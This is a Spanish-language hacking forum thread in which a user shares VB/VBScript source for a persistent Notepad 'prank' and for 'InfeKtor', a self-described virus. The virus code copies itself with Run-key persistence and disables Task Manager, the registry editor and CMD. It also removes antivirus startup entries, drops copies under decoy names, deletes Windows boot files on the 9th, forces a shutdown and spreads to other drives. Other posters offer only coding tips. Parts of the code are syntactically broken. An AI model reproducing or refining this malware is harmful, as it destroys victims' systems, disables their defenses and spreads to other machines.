 Autor
|
Tema: Mi proyecto broma en vbs (Leído 6,244 veces)
|
Enemy
 Desconectado
Mensajes: 285
Que vuelva el personal de hace 15 años al foro!
|
Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto.. Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado.  Buena aca el code, es bastante simple : Private Sub Form_Load()
'Declaro algunas variables
Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar
On Error Resume Next
Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"
'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"
'En este tambien, deben dejar solo uno, es opcional
Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"
' Se copia asi mismo, en la ruta donde sera buscado luego en el registro
Do
Wscript.sleep 70000
' No hara nada por 1,10 minutos y despues ejecuta el block de notas
Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500 ' Le da tiempo al notepad para que se termine de abrir
WSSvar.AppActivate Molesto.processid
' Esto hara que coloque las palabras sobre el block de notas
Wscript.sleep 700 'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid
'Envia pulsaciones de teclado que se escribiran sobre el notepad.
'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/ #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-# # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./ # #"
Loop 'Se repite nuevamente
End Sub
pueden hacer este agregado si quieren o bien cambiarlo por: Dim WSSvar
Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe" pero en caso de agregarlo se iniciarian dos.. jaja no se pregunten porque tiene ese nombre "sexDonkey"  voy a seguir trabajando en el, espero que quede bueno. SALUD.O.S
|
|
|
|
« Última modificación: 11 Octubre 2008, 22:09 pm por Bakura182 »
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
Ahora entiendo porque el problema con el sleep ..... Es que en vbs, si al sleep le pones esperas muy grandes... muere . Lo mejor sería utilizar un timer (lo estas haciendo en VB) en una función, y cuando lo necesites lo llamas. Saludos 
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
Enemy
Desconectado
Mensajes: 285
Que vuelva el personal de hace 15 años al foro!
|
Ahora entiendo porque el problema con el sleep ..... Es que en vbs, si al sleep le pones esperas muy grandes... muere . Es verad jaja pero al exe tambien se lo cierra y listo, fue.. La idea es ponerle el nombre de algu nombre como svchost.exe o winlogon, explorer.exe Es asi nomas, la idea es dejar las mejores funciones para los virus y demas.. tengo tres proyectos: dos virus y una broma.. InfeKtor, V-InfeKtor y K-Joke Este es el del InfeKtor : '-------------------------------------------------------_____##########____-------------------------------------------------
'0111001011011000111010010100000100010001100111011100100\--_--_--_--_--_--/0101011101001010010100100001000100100110001010011
'-------------------------------------------------------/ INFEKTOR 2.4 \-------------------------------------------------
'0101011101001010010100100001000100100110001010011011001\ +--+---+---+--+ /1001011011000111010010100000100010001100111011100
'-------------------------------------------------------/ By: Bakura182 \-------------------------------------------------
'0101100111010111010101011101001110001101010111110100100�������������������0101111101001000101011101000100100110001010010011
'---------------------------------------------------------------------------------------------------------------------------
'Aca defino todas las variables a usar
Dim Batch
Dim InfKFSOvar
Dim CodigoAutoR
Dim InfKWSSvar
Dim EjecChauIniW
Dim i
Dim x
Dim Uni
'Empiezo creando la carpeta que almacenara el virus InfeKtor
On error resume next
Set InfKFSOvar = CreateObject("Scripting.FileSystemObject")
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor"
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
'Se copia asi mismo
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
'Se crea el autorun con las opciones de abrir, explorar y escaneo falso de virus
Set CodigoAutoR = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf",True)
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "[Autorun]"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "shell\1=Abrir"
CodigoAutoR.WriteLine ";mpaF3AkDI2KK5awial3lK43w4Dl3JesLKrj0iL9DcsSo9waO2349wdlk"
CodigoAutoR.WriteLine "shell\1\command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";8lkakfo431kip3dsoe2Daw53dqJsDKKcJalJoof70osK43LKfC0UksswlLksZko5jkL5qsK434LiJe2j"
CodigoAutoR.WriteLine "shell\1\default=1"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9loe5200Ds49LIr8LqXckkKewpAc9oiskk0K4i2arwL30533o4Kdsrajsairwr38al"
CodigoAutoR.WriteLine "Shell\2=Explorar"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5jiie23AJa2awkakf28kDp
CodigoAutoR.WriteLine "Shell\2\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5ji
CodigoAutoR.WriteLine "Shell\5=Escanear virus"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "Shell\5\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9l53REsdSdf3f4gFw692oaA9al"
CodigoAutoR.WriteLine "1=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "2=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "5=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2A3Rsa3L"
CodigoAutoR.Close
'Se crea un bat que le a�ade atributos al virus y demas y que se los saca a otros.. jeje
'Volviendolos visibles para usuarios inexpertos y lograr asi que se autodestruyan el inicio de W
'sino a esperar hasta el nueve como mas abajo se vera
Set Batch = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat",True)
Batch.WriteLine "@echo off"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor"
Batch.WriteLine "attrib -h -r -s C:\IO.sys"
Batch.WriteLine "attrib -h -r -s C:\COMAND.com
Batch.WriteLine "attrib -h -r -s C:\NTDETECT.bat"
Batch.WriteLine "attrib -h -r -s C:\boot.ini"
Batch.WriteLine "attrib -h -r -s C:\MSDOS.sys"
Batch.WriteLine "attrib -h -r -s C:\bootfont.bin"
Batch.WriteLine "attrib -h -r -s C:\ntldr.sys"
Batch.WriteLine "attrib -h -r -s C:\pagefile.sys"
Batch.WriteLine "attrib -h -r -s C:\IO.sys "
Batch.WriteLine "attrib -h -r -s C:\AUTOEXEC.bat"
Batch.WriteLine "attrib -h -r -s C:\CONFIG.sys"
Batch.WriteLine "attrib -h -r -s C:\Windows\WIN.ini
Batch.WriteLine "attrib -h -r -s C:\Windows\SYSTEM.ini
Batch.WriteLine "attrib -a -h -r -s C:\Config.Msi"
Batch.WriteLine "attrib -a -h -r -s C:\RECYCLER"
Batch.WriteLine "attrib -a -h -r -s C:\System Volume Information"
Batch.WriteLine "exit"
Batch.close
'tengo que pasarlo a VBS mejor, no conviene ejecutar un bat ya que saltaria la consola y es muy llamativa..
'Ejecuto el bat
Set InfKWSSvar = CreateObject("WScript.Shell")
InfKWSSvar.Run "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"
'Y lo borro, ya que es muy facil editarlo y hacer lo contrario... ��'
InfKFSOvar.DeleteFile "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"
'Se guarda en el registro y otras opciones
InfKWSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden",0,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD")
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",2,"REG_DWORD")
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden",1,"REG_DWORD")
InfKWSSvar.regwrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1")
InfKWSSvar.regwrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD")
'Aca quiero agregar la mayor cantidad de AV para que no se inicien, solo llevo dos =( ..
InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NAV Agent"
InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kav"
'Si el dia es distinto a 9 entonces procede a crear una copia de si mismo con un nombre diferente, sino borra los archivos de arranque de windows, sin ellos windows no arranca
if Day(Now()) <> 9 then
Wscript.sleep 10000
Randomize
Azar = Int(Rnd * 10)
If Azar = "0" Then Nombre = "Password Generator"
If Azar = "1" Then Nombre = "Install K-raoke"
If Azar = "2" Then Nombre = "SysUtils"
If Azar = "3" Then Nombre = "UnistallerX"
If Azar = "4" Then Nombre = "Mk2"
If Azar = "5" Then Nombre = ""
If Azar = "6" Then Nombre = "Messenger error"
If Azar = "7" Then Nombre = "Iexplorer"
If Azar = "8" Then Nombre = "Abu"
If Azar = "9" Then Nombre = "EasyWeb"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Mis documentos" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Adminstrador\Escritorio" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\All Users\Escritorio
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\Usuario\Escritorio"," & Nombre & ".exe"
'Tendria que crear algo que despues ejecute a cualquiera de ellos, sino es en vano jaja
else
On error resume next
InfKFSOvar.DeleteFile "C:\IO.sys"
InfKFSOvar.DeleteFile "C:\AUTOEXEC.bat"
InfKFSOvar.DeleteFile "C:\CONFIG.sys"
InfKFSOvar.DeleteFile "C:\COMAND.com"
InfKFSOvar.DeleteFile "C:\NTDETECT.bat"
InfKFSOvar.DeleteFile "C:\Windows\WIN.ini"
InfKFSOvar.DeleteFile "C:\boot.ini"
InfKFSOvar.DeleteFile "C:\MSDOS.sys"
InfKFSOvar.DeleteFile "C:\bootfont.bin"
InfKFSOvar.DeleteFile "C:\ntldr.sys"
InfKFSOvar.DeleteFile "C:\pagefile.sys"
InfKFSOvar.DeleteFile "C:\Windows\SYSTEM.ini"
InfKFSOvar.DeleteFolder "C:\Config.Msi"
InfKFSOvar.DeleteFolder "C:\RECYCLER"
InfKFSOvar.DeleteFolder "C:\System Volume Information".DeleteFile "C:\IO.sys"
End if
'Crea otro bat que apaga el ordenador y avisa que ha sido victima del infeKtor (tarde el aviso pero bueh,ja)
Set ChauIniW = InfKFSOvar.CreateTextFile ".\Salud.o.s.bat,True"
ChauIniW.Writeline "@echo off"
ChauIniW.Writeline "Shutdown -s -t 5 -c Has_Sido_Victima_Del_InfeKtor..."
ChauIniW.Writeline "Exit"
ChauIniW.Close
Set EjecChauIniW = CreateObject("WScript.Shell")
EjecChauIniW.Run ".\Salud.o.s.bat"
End if
'Propagacion por unidades
' he aqui el ejemplo tuyo de propagacion
Set FSOvar = createobject("scripting.filesystemobject")
Set uni = FSOvar.drives
For each x in uni
If x.driveletter <> "A" and x.drivetype = 1 then
FSOvar.copyfile wscript.scriptfullname, x.driveletter &":\"
msgbox "contagio en " & x.driveletter
End If
Next Debo remplazar el bat por codigo en vbs , con los atributos en 39, pero lo hago despues, estoy muy ocupado con el estudio jaja SALUD.O.S
|
|
|
|
« Última modificación: 11 Octubre 2008, 23:06 pm por Bakura182 »
|
En línea
|
|
|
|
Enemy
Desconectado
Mensajes: 285
Que vuelva el personal de hace 15 años al foro!
|
Ahora que lo leo bien.... Me falto copiar el autorun en las unidades extraibles.!!  todavia esta en construccion, todos los dias trabajo un poquitito en ellos, si tengo tiempo claro.. SALUD.O.S |
|
|
|
|
En línea
|
|
|
|
|
aaronduran2
|
¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
¿Por qué utilizas Private Sub Form_Load()?
Es VBS, no VB.
Saludos.
Porque piensa compilarlo con VB 
|
|
|
|
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
Enemy
Desconectado
Mensajes: 285
Que vuelva el personal de hace 15 años al foro!
|
Ya se que es de VB.. Se me mezclan las cosas, los pruebo en VBS y los paso a VB cambiando un par de cosas.. En resumen, se me fue de manos..  Ahora lo edito... para la gente que le molesta ver eso ahi SALUD.O.S |
|
|
|
|
En línea
|
|
|
|
|
aaronduran2
|
No hace falta hombre, lo que pasa es que no me coincidía.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
|
 |
